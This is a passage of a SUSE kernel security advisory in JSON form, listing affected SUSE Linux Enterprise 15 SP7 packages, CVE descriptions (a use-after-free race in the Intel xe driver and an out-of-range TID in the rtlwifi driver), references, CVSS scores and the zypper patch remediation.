"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71098"
},
{
"cve": "CVE-2025-71099",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71099"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/xe/oa: Fix potential UAF in xe_oa_add_config_ioctl()\n\nIn xe_oa_add_config_ioctl(), we accessed oa_config-\u003eid after dropping\nmetrics_lock. Since this lock protects the lifetime of oa_config, an\nattacker could guess the id and call xe_oa_remove_config_ioctl() with\nperfect timing, freeing oa_config before we dereference it, leading to\na potential use-after-free.\n\nFix this by caching the id in a local variable while holding the lock.\n\nv2: (Matt A)\n- Dropped mutex_unlock(\u0026oa-\u003emetrics_lock) ordering change from\n xe_oa_remove_config_ioctl()\n\n(cherry picked from commit 28aeaed130e8e587fd1b73b6d66ca41ccc5a1a31)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71099",
"url": "https://www.suse.com/security/cve/CVE-2025-71099"
},
{
"category": "external",
"summary": "SUSE Bug 1256592 for CVE-2025-71099",
"url": "https://bugzilla.suse.com/1256592"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-71099"
},
{
"cve": "CVE-2025-71100",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71100"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtlwifi: 8192cu: fix tid out of range in rtl92cu_tx_fill_desc()\n\nTID getting from ieee80211_get_tid() might be out of range of array size\nof sta_entry-\u003etids[], so check TID is less than MAX_TID_COUNT. Othwerwise,\nUBSAN warn:\n\n UBSAN: array-index-out-of-bounds in drivers/net/wireless/realtek/rtlwifi/rtl8192cu/trx.c:514:30\n index 10 is out of range for type \u0027rtl_tid_data [9]\u0027",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
